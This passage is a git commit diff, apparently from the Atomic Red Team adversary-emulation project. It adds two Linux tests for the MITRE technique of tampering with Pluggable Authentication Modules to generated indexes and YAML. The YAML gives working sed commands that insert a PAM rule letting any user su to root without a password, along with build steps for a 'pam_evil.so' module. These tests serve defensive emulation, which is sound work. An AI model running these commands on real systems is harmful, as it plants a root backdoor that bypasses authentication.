Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-08-27 15:57:14 +00:00
parent 509d87ad1e
commit eb62bcd9fc
10 changed files with 440 additions and 17 deletions
@@ -71,6 +71,8 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
+credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -447,6 +449,8 @@ defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16
 defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
 defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
+defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
@@ -594,6 +598,8 @@ persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,
 persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
 persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
+persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
 persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
@@ -15,6 +15,8 @@ credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
+credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
@@ -119,6 +121,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
 defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
+defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
@@ -198,6 +202,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
 persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
 persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
+persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
+persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
 persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
@@ -112,7 +112,9 @@
  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
@@ -740,7 +742,9 @@
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1018,7 +1022,9 @@
  - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
  - Atomic Test #1: Plist Modification [macos]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
  - Atomic Test #1: Add Port Monitor persistence in Registry [windows]
@@ -39,7 +39,9 @@
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
@@ -275,7 +277,9 @@
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
  - Atomic Test #1: Decode base64 Data into Script [macos, linux]
 - T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -489,7 +493,9 @@
 - T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
+  - Atomic Test #1: Malicious PAM rule [linux]
+  - Atomic Test #2: Malicious PAM module [linux]
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
@@ -24,7 +24,7 @@
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) |  | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Screen Capture](../../T1113/T1113.md) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -37,7 +37,7 @@
 |  |  | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
 |  |  | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) |  | [Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [RC Scripts](../../T1037.004/T1037.004.md) |  | [Install Root Certificate](../../T1553.004/T1553.004.md) |  |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -54,7 +54,7 @@
 |  |  | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) |  |  |  |  |  |  |  |
 |  |  | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -41,7 +41,7 @@
 |  | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
+|  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  |  |  |
 |  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) |  |  |  |  |  |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -72,7 +72,7 @@
 |  |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [InstallUtil](../../T1218.004/T1218.004.md) |  |  |  |  |  |  |  |
 |  |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
+|  |  | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) |  |  |  |  |  |  |  |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -101,7 +101,7 @@
 |  |  | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Transport Agent](../../T1505.002/T1505.002.md) |  | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) |  |  |  |  |  |  |  |
-|  |  | [Trap](../../T1546.005/T1546.005.md) |  | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | [Trap](../../T1546.005/T1546.005.md) |  | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) |  |  |  |  |  |  |  |
 |  |  | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Web Shell](../../T1505.003/T1505.003.md) |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
@@ -5148,7 +5148,100 @@ credential-access:
      x_mitre_platforms:
      - Linux
      - macOS
-    atomic_tests: []
+      identifier: T1556.003
+    atomic_tests:
+    - name: Malicious PAM rule
+      auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
+      description: |
+        Inserts a rule into a PAM config and then tests it.
+
+        Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient pam_succeed_if.so uid >= 0
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
+    - name: Malicious PAM module
+      auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
+      description: |
+        Creates a PAM module, inserts a rule to use it, and then tests it.
+
+        Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient /tmp/pam_evil.so
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+        path_to_pam_module_source:
+          description: Path to PAM module source code.
+          type: path
+          default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+        path_to_pam_module:
+          description: Path to PAM module object
+          type: path
+          default: "/tmp/pam_evil.so"
+      dependencies:
+      - description: 'The PAM development library must be installed to build the PAM
+          module
+
+'
+        prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
+          0; else exit 1; fi;
+
+'
+        get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
+          libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
+          fi
+
+'
+      - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
+
+'
+        prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
+          fi;
+
+'
+        get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
  T1552.004:
    technique:
      id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
@@ -31787,7 +31880,100 @@ defense-evasion:
      x_mitre_platforms:
      - Linux
      - macOS
-    atomic_tests: []
+      identifier: T1556.003
+    atomic_tests:
+    - name: Malicious PAM rule
+      auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
+      description: |
+        Inserts a rule into a PAM config and then tests it.
+
